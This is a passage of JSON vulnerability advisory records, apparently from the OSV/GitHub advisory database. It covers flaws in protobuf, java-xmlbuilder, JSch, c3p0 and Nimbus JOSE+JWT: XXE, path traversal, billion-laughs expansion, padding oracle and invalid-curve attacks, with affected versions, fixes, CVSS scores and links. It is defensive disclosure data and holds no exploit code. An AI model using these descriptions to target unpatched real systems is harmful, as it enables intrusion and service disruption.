"3.19.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-wrvw-hg22-4m67/GHSA-wrvw-hg22-4m67.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22569" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330" }, { "type": "WEB", "url": "https://cloud.google.com/support/bulletins#gcp-2022-001" }, { "type": "PACKAGE", "url": "https://github.com/protocolbuffers/protobuf" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/12/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/12/7" } ], "database_specific": { "cwe_ids": [ "CWE-696" ], "github_reviewed": true, "github_reviewed_at": "2022-01-07T22:23:14Z", "nvd_published_at": "2022-01-10T14:10:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3vrc-rrpw-r5pw", "published": "2023-02-19T18:30:21Z", "modified": "2024-03-01T14:52:28.150101Z", "aliases": [ "CVE-2014-125087" ], "summary": "java-xmlbuilder vulnerable to XML External Entity Reference", "details": "A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480.", "affected": [ { "package": { "name": "com.jamesmurty.utils:java-xmlbuilder", "ecosystem": "Maven", "purl": "pkg:maven/com.jamesmurty.utils/java-xmlbuilder" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.2" } ] } ], "versions": [ "0.3", "0.4", "0.6", "1.0", "1.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125087" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/issues/6" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/commit/e6fddca201790abab4f2c274341c0bb8835c3e73" }, { "type": "PACKAGE", "url": "https://github.com/jmurty/java-xmlbuilder" }, { "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240208-0009" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.221480" }, { "type": "WEB", "url": "https://vuldb.com/?id.221480" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2023-03-01T20:46:06Z", "nvd_published_at": "2023-02-19T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q446-82vq-w674", "published": "2022-05-13T01:09:33Z", "modified": "2024-02-20T05:33:38.873866Z", "aliases": [ "CVE-2016-5725" ], "summary": "Improper Limitation of a Pathname to a Restricted Directory in JCraft JSch", "details": "Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\\ (dot dot backslash) in a response to a recursive GET command.", "affected": [ { "package": { "name": "com.jcraft:jsch", "ecosystem": "Maven", "purl": "pkg:maven/com.jcraft/jsch" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.1.54" } ] } ], "versions": [ "0.1.23", "0.1.24", "0.1.25", "0.1.27", "0.1.29", "0.1.31", "0.1.38", "0.1.41", "0.1.42", "0.1.43", "0.1.43-1", "0.1.44", "0.1.44-1", "0.1.45", "0.1.46", "0.1.47", "0.1.48", "0.1.49", "0.1.50", "0.1.51", "0.1.52", "0.1.53" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.1.53", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-q446-82vq-w674/GHSA-q446-82vq-w674.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5725" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3115" }, { "type": "WEB", "url": "https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00017.html" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/40411" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/138809/jsch-0.1.53-Path-Traversal.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2016/Sep/53" }, { "type": "WEB", "url": "http://www.jcraft.com/jsch/ChangeLog" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:44:21Z", "nvd_published_at": "2017-01-19T22:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-84p2-vf58-xhxv", "published": "2019-04-23T16:03:18Z", "modified": "2024-02-16T08:07:45.873484Z", "aliases": [ "CVE-2019-5427" ], "summary": "Billion laughs attack in c3p0", "details": "c3p0 version \u003c 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.", "affected": [ { "package": { "name": "com.mchange:c3p0", "ecosystem": "Maven", "purl": "pkg:maven/com.mchange/c3p0" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.5.4" } ] } ], "versions": [ "0.9.2", "0.9.2-pre2-RELEASE", "0.9.2-pre3", "0.9.2-pre4", "0.9.2-pre5", "0.9.2-pre6", "0.9.2-pre7", "0.9.2-pre8", "0.9.2.1", "0.9.5", "0.9.5-pre1", "0.9.5-pre10", "0.9.5-pre2", "0.9.5-pre3", "0.9.5-pre4", "0.9.5-pre5", "0.9.5-pre6", "0.9.5-pre7", "0.9.5-pre8", "0.9.5-pre9", "0.9.5.1", "0.9.5.2", "0.9.5.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.9.5.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-84p2-vf58-xhxv/GHSA-84p2-vf58-xhxv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5427" }, { "type": "WEB", "url": "https://hackerone.com/reports/509315" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFIVX6HOVNLAM7W3SUAMHYRNLCVQSAWR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQ47OFV57Y2DAHMGA5H3JOL4WHRWRFN4" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2019-04-23T16:01:51Z", "nvd_published_at": "2019-04-22T21:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-q485-j897-qc27", "published": "2019-01-07T19:14:34Z", "modified": "2024-02-17T05:36:17.856971Z", "aliases": [ "CVE-2018-20433" ], "summary": "XML External Entity Reference in mchange:c3p0", "details": "c3p0 0.9.5.2 allows XXE in extractXmlConfigFromInputStream in com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java during initialization.", "affected": [ { "package": { "name": "com.mchange:c3p0", "ecosystem": "Maven", "purl": "pkg:maven/com.mchange/c3p0" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.5.3" } ] } ], "versions": [ "0.9.2", "0.9.2-pre2-RELEASE", "0.9.2-pre3", "0.9.2-pre4", "0.9.2-pre5", "0.9.2-pre6", "0.9.2-pre7", "0.9.2-pre8", "0.9.2.1", "0.9.5", "0.9.5-pre1", "0.9.5-pre10", "0.9.5-pre2", "0.9.5-pre3", "0.9.5-pre4", "0.9.5-pre5", "0.9.5-pre6", "0.9.5-pre7", "0.9.5-pre8", "0.9.5-pre9", "0.9.5.1", "0.9.5.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.9.5.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-q485-j897-qc27/GHSA-q485-j897-qc27.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20433" }, { "type": "WEB", "url": "https://github.com/zhutougg/c3p0/commit/2eb0ea97f745740b18dd45e4a909112d4685f87b" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-q485-j897-qc27" }, { "type": "PACKAGE", "url": "https://github.com/zhutougg/c3p0" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/12/msg00021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFIVX6HOVNLAM7W3SUAMHYRNLCVQSAWR" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQ47OFV57Y2DAHMGA5H3JOL4WHRWRFN4" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:50:54Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2qp9-wg27-9pcv", "published": "2022-05-13T01:30:32Z", "modified": "2023-11-08T03:58:54.698483Z", "aliases": [ "CVE-2017-12972" ], "summary": "Nimbus JOSE+JWT missing overflow check", "details": "In Nimbus JOSE+JWT before 4.39, there is no integer-overflow check when converting length values from bytes to bits, which allows attackers to conduct HMAC bypass attacks by shifting Additional Authenticated Data (AAD) and ciphertext so that different plaintext is obtained for the same HMAC.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.39" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-2qp9-wg27-9pcv/GHSA-2qp9-wg27-9pcv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12972" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/0d2bd649ea386539220d4facfe1f65eb1dadb86c" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/224/byte-to-bit-overflow-in-cbc" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-345" ], "github_reviewed": true, "github_reviewed_at": "2022-11-08T22:28:09Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f6vf-pq8c-69m4", "published": "2019-10-16T18:31:17Z", "modified": "2024-03-14T05:19:45.441054Z", "aliases": [ "CVE-2019-17195" ], "summary": "Improper Check for Unusual or Exceptional Conditions in Connect2id Nimbus JOSE+JWT", "details": "Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.9" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", "4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", "6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/10/GHSA-f6vf-pq8c-69m4/GHSA-f6vf-pq8c-69m4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17195" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcac26c2d4df22341fa6ebbfe93ba1eff77d2dcd3f6106a1dc1f9ac98@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e08837e695efd36be73510ce58ec05785dbcea077819d8acc2d990d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35f6301a3e6a56259224786dd9c2a935ba27ff6b494d15a3b66efe6a@%3Cdev.avro.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33dc233634aedb04fa77db3eb79ea12d15ca4da89fa46a1c585ecb0b@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2667286c8ceffaf893b16829b9612d8f7c4ee6b30362c6c1b583e3c2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e10d43984f39327e443e875adcd4a5049193a7c010e81971908caf41@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8768553cda5838f59ee3865cac546e824fa740e82d9dc2a7fc44e80d@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://connect2id.com/blog/nimbus-jose-jwt-7-9" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/SECURITY-CHANGELOG.txt" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" } ], "database_specific": { "cwe_ids": [ "CWE-754", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2019-10-16T15:26:53Z", "nvd_published_at": "2019-10-15T14:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gvpg-vgmx-xg6w", "published": "2024-02-11T06:30:27Z", "modified": "2024-10-30T21:46:42.418884Z", "aliases": [ "CGA-hvjw-cqfw-cqf3", "CVE-2023-52428" ], "related": [ "CGA-63mv-w982-8q6x", "CGA-7847-h394-6rg8", "CGA-7v5w-r37c-32w7", "CGA-7x8r-hc4w-927c", "CGA-88mj-xqrj-5rg4", "CGA-xqhq-97gr-pfg7" ], "summary": "Denial of Service in Connect2id Nimbus JOSE+JWT", "details": "In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.37.2" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.39", "4.39.1", "4.39.2", "4.4", "4.40", "4.41", "4.41.1", "4.41.2", "4.41.3", "4.5", "4.6", "4.7", "4.8", "4.9", "5.0", "5.1", "5.10", "5.11", "5.12", "5.13", "5.14", "5.2", "5.3", "5.4", "5.5", "5.6", "5.7", "5.8", "5.9", "6.0", "6.0.1", "6.0.2", "6.1", "6.1.1", "6.2", "6.3", "6.3.1", "6.4", "6.4.1", "6.4.2", "6.5", "6.5.1", "6.6", "6.7", "6.8", "7.0", "7.0.1", "7.1", "7.2.1", "7.3", "7.4", "7.5", "7.5.1", "7.6", "7.7", "7.8", "7.8.1", "7.9", "8.0", "8.1", "8.10", "8.11", "8.12", "8.13", "8.14", "8.14.1", "8.15", "8.16", "8.17", "8.17.1", "8.18", "8.18.1", "8.19", "8.2", "8.2.1", "8.20", "8.20.1", "8.20.2", "8.21", "8.21.1", "8.22", "8.22.1", "8.23", "8.3", "8.4", "8.4.1", "8.5", "8.5.1", "8.6", "8.7", "8.8", "8.9", "9.0", "9.0.1", "9.1", "9.1.1", "9.1.2", "9.1.3", "9.1.4", "9.1.5", "9.10", "9.10.1", "9.11", "9.11.1", "9.11.2", "9.11.3", "9.12", "9.12.1", "9.13", "9.14", "9.15", "9.15.1", "9.15.2", "9.16", "9.16-preview.1", "9.16.1", "9.17", "9.18", "9.19", "9.2", "9.20", "9.21", "9.21.1", "9.22", "9.23", "9.24", "9.24.1", "9.24.2", "9.24.3", "9.24.4", "9.25", "9.25.1", "9.25.2", "9.25.3", "9.25.4", "9.25.5", "9.25.6", "9.26", "9.27", "9.28", "9.29", "9.3", "9.30", "9.30.1", "9.30.2", "9.31", "9.32", "9.33", "9.34", "9.35", "9.36", "9.37", "9.37.1", "9.4", "9.4.1", "9.4.2", "9.5", "9.6", "9.6.1", "9.7", "9.8", "9.8.1", "9.9", "9.9.1", "9.9.2", "9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-gvpg-vgmx-xg6w/GHSA-gvpg-vgmx-xg6w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52428" }, { "type": "PACKAGE", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/3b3b77e" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/526" }, { "type": "WEB", "url": "https://connect2id.com/products/nimbus-jose-jwt" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2024-03-15T14:23:03Z", "nvd_published_at": "2024-02-11T05:15:08Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jfmq-4g4m-99rh", "published": "2022-05-13T01:42:51Z", "modified": "2023-11-08T03:58:54.759362Z", "aliases": [ "CVE-2017-12973" ], "summary": "Nimbus JOSE+JWT vulnerable to padding oracle attack", "details": "Nimbus JOSE+JWT before 4.39 proceeds improperly after detection of an invalid HMAC in authenticated AES-CBC decryption, which allows attackers to conduct a padding oracle attack.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.39" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.36", "4.36.1", "4.37", "4.37.1", "4.38", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jfmq-4g4m-99rh/GHSA-jfmq-4g4m-99rh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12973" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/6a29f10f723f406eb25555f55842c59a43a38912" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/223/aescbc-return-immediately-on-invalid-hmac" }, { "type": "WEB", "url": "https://bitbucket.org/connect2id/nimbus-jose-jwt/src/master/CHANGELOG.txt" } ], "database_specific": { "cwe_ids": [ "CWE-354" ], "github_reviewed": true, "github_reviewed_at": "2022-11-08T23:03:33Z", "nvd_published_at": "2017-08-20T16:29:00Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pfv2-37f7-9m6w", "published": "2022-05-13T01:30:32Z", "modified": "2023-11-08T03:58:54.822926Z", "aliases": [ "CVE-2017-12974" ], "summary": "Improper Verification of Cryptographic Signature in Nimbus JOSE+JWT", "details": "Nimbus JOSE+JWT before 4.36 proceeds with ECKey construction without ensuring that the public x and y coordinates are on the specified curve, which allows attackers to conduct an Invalid Curve Attack in environments where the JCE provider lacks the applicable curve validation.", "affected": [ { "package": { "name": "com.nimbusds:nimbus-jose-jwt", "ecosystem": "Maven", "purl": "pkg:maven/com.nimbusds/nimbus-jose-jwt" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.36" } ] } ], "versions": [ "2.10", "2.10.1", "2.11.0", "2.12.0", "2.13.0", "2.13.1", "2.14.0", "2.15.0", "2.15.1", "2.15.2", "2.16", "2.17", "2.17.1", "2.17.2", "2.18", "2.18.1", "2.18.2", "2.19", "2.19.1", "2.20", "2.21", "2.22", "2.22.1", "2.23", "2.24", "2.25", "2.26", "2.26.1", "2.9", "3.0", "3.1", "3.1.1", "3.1.2", "3.10", "3.2", "3.2.1", "3.2.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.8.2", "3.9", "3.9.1", "3.9.2", "4.0", "4.0-rc1", "4.0-rc2", "4.0-rc3", "4.0-rc4", "4.0.1", "4.1", "4.1.1", "4.10", "4.11", "4.11.1", "4.11.2", "4.12", "4.13", "4.13.1", "4.14", "4.15", "4.15.1", "4.16", "4.16.1", "4.16.2", "4.17", "4.18", "4.19", "4.2", "4.20", "4.21", "4.22", "4.23", "4.24", "4.25", "4.26", "4.26.1", "4.27", "4.27.1", "4.28", "4.29", "4.3", "4.3.1", "4.30", "4.31.1", "4.32", "4.33", "4.34", "4.34.1", "4.34.2", "4.35", "4.4", "4.5", "4.6", "4.7", "4.8", "4.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pfv2-37f7-9m6w/GHSA-pfv2-37f7-9m6w.json" } } ], "references": [ { "type": 